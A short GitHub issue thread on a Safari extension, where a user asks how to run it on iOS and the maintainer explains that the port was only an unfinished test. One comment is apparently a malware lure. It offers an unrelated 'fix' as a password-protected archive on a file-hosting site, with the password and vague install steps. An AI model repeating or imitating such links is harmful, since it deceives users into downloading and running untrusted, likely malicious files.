### ISSUE TITLE
Okay I'm new here to GitHub, so how do you get this to work on IOS?

### ISSUE THREAD

**Issue by ghost** [KC-2001MS/BlockTube-for-Safari#3]

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ghost** [comment]
Wait I'm confused, so which file out of the two I'm downloading to do this?

**Comment by KC-2001MS** [comment]
Sorry, but no matter which file you install, you will not be able to get this app to work fully.
This was made to test the possibility of porting it to the iOS version, not to actually release it. I do not have the Javascript skills to do much more than this and have been too busy to work on this project.
My apologies.
If you have Javascript knowledge and want this app to work, you are welcome to test and improve this extension to make it work.

**Comment by ghost** [comment]
Oh shame, but thanks for letting me know/I'll wait it out and keep using the official version!
